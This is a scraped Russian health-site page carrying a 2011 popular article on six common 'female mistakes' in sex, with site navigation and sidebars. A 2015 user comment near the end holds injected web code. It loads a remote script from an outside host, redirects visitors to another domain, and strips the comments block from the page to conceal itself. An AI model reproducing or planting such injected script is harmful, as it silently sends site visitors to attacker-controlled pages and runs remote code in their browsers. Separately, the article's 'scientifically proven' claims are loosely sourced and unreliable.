Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  6 женских ошибок в сексе  >>  6 женских ошибок в сексе
 
Обратная связь
 

6 женских ошибок в сексе

Размер шрифта
03 сентября 2011 07:00
  • google_analytics: false
  • Нравится

Супружескую постель делят двое, и ошибки в ней допускают обе стороны. Сегодня поговорим о самых распространенных женских промахах.

Ошибки

Александр Тушкин / «Здоровье инфо»

Ошибка №1. От вас нет инициативы

Женщины слишком часто занимают пассивную сторону в сексе, так как не хотят показаться настойчивыми или даже агрессивными. По мнению сексологов, это самая большая ошибка женщин, которая связана с устаревшим представлением о распределении социальных ролей между полами. Считается, что женщины не так сексуально активны, как мужчины. Из-за этого мужчины постоянно чувствуют себя в качестве инициаторов, а это вносит серьезный дисбаланс в отношения. Мужчины так же хотят быть соблазнены своими партнерами, чтобы не чувствовать, что «это только им надо».

Сексуальную активность должны проявлять оба партнера. Если вы делаете первый шаг, то берете на себя ответственность за сексуальные переживания в паре. Это улучшает качество секса и сближает партнеров.

Ошибка №2. Вас беспокоит то, как вы выглядите

Если вы будете размышлять в постели о своем внешнем виде, то вряд ли получите удовольствие от секса и уж точно не достигнете оргазма. Ваше расстройство перекинется и на партнера, тогда сексуальный контакт можно будет признать несостоявшимся.

Научно доказано, что мужчины не замечают даже половины тех вещей, которые вызывают у вас беспокойство. Форма бедер и живота, целлюлит, смазавшийся макияж, испорченная прическа – мужчинам все равно. Примечательно, что такая выборочная слепота наступает у мужчин только в постели. Их гораздо больше заботит ваша энергичность, энтузиазм и заинтересованность в половом контакте. Эти признаки давали возможность мужчинам выбирать наиболее фертильных самок для успешного продолжения человеческого рода.

Ошибка №3. Вы считаете, что для мужчин секс важнее отношений

Это третье величайшее заблуждение о сексуальных отношениях. Мужчины гораздо больше ценят сексуальные контакты в рамках длительных отношений, чем случайный секс. Научные исследования подтверждают это: представители обоих полов находят сексуальную близость более удовлетворительной, если она была совершена в контексте отношений. Поэтому, согласно данным опросов, самые лучшие и наиболее частые сексуальные контакты случаются у супругов.

Научно доказано, что мужчины относятся к сексу и отношениям даже более серьезно, чем женщины. Американские ученые пригласили студентов университета для участия в эксперименте, в рамках которого они могли заняться случайным сексом. Последующий опрос показал, что 50% женщин и 52% мужчин занялись сексом, так как надеялись на создание пары. При этом 30% из них так и поступили.

Ошибка №4. Вы считаете, что мужчины всегда готовы к совокуплению

Постоянная готовность к сексу характерна скорее для подростков, чем для мужчин. Стресс в повседневной жизни сокращает мужское либидо, что может стать неприятным сюрпризом для женщины. Запомните, если он не хочет, то он не хочет «вообще», а не только «с вами».

Ошибка в постели

Ошибка №5. Вы не говорите ему, что вы хотите получить от секса

Вы должны четко разъяснить вашему партнеру, что вы хотите. И в свою очередь выслушать его. Откровенный разговор – это единственный способ достижения стабильных сексуальных отношений, пусть он будет вам и не по душе.

Ни один мужчина не сможет довести женщину до оргазма, пока она не возьмет на себя ответственность за свой сексуальный опыт. Даже лучший в мире любовник не знает точно, чего хочет женщина.

Вашу инициативу мужчина примет с радостью, так как он заинтересован в том, чтобы удовлетворить ваши сексуальные желания. Однако вам следует найти такие слова, которые не покоробят его мужскую самооценку.

Ошибка №6. Вы расстраивайтесь, когда он предлагает что-нибудь новое

После пары лет совместной жизни всегда хочется как-нибудь разнообразить половые отношения. Если ваш партнер предлагает попробовать что-то новое в сексе, это не обязательно значит, что он недоволен качеством секса.

Вы не должны делать то, чего не хотите. Особенно в интимной сфере. Если ваш партнер настаивает на неприемлемой для вас вещи, дайте ему четко понять, почему вы не хотите этого делать. При этом вам нужно подобрать слова, которые не заденут его.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
То как вы спите, расскажет все о ваших отношениях   Синхронность сна скажет, насколько вы удовлетворены мужем!   Что любовь сделает с вами?   Как пережить расставание по науке  
09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить? 08 мая 2013Хотите знать, что ваш возлюбленный чувствует по отношению к вам? Послушайте его сердце и сравните со своим!
 
26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса! 12 декабря 2012Гормон оргазма не дает мужчинам изменять
 

Слайдшоу

1
Признаки развода, которые вы игнорируете
Жаркий секс за 5 минут!
Мужчины. Как их понять?

Тесты

Заболеет ли ваша семья?
Здорова ли ваша предстательная железа
Вы и то, что на вас
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.